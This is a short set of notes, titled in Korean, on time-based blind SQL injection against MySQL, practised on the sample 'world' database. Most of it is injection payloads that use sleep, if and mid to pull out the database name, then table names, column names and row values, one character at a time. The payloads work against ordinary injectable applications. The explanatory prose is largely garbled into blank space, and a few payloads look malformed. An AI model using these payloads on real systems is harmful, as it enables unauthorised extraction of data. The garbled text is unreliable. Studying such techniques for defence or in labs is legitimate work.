시차 기반 SQL 블라인드

       : MySQL
   ：world
 ：city
 :ID Name CountryCode District Population

sleep(s)
	SQL        s 
mid(s,n,len)
	     s   n         len      
length(s)
	      s     
if(expr,v1,v2)
	      expr   ，     v1；  ，     v2。
substr(s,n,len)
	     s   n         len      
ascii(s)
	             ASCII  
limit
	   SELECT           
database()
	        

(select * from(select sleep(12)union/ select 1)a)

      
		(if((length(database())=4),sleep(5),0))
		  ：
				        5，   sleep(5)
     
		sleep(if((mid(database(),1,1)="a"),5,0))
		  ：
				          a，   sleep(5)
		sleep(if((ascii(substr(database(),1,1)))=97),5,0))
		  ：
				          a，   sleep(5)

    
	(select sleep(if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6,5,0)))
   
	(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='c'),5,0)))
	(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='i'),5,0)))
	(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1)='t'),5,0)))
	(select sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1)='y'),5,0)))

   
	(select sleep(if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1)=2,5,0)))
   
	(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),1,1)='I'),5,0)))
	(select sleep(if((mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='city' limit 0,1),2,1)='D'),5,0)))

    
	(select sleep(if((select length(ID) from world.city limit 0,1)=1,5,0)))
     
	(select sleep(if((mid((select ID from world.city limit 0,1),1,1)='1'),5,0)))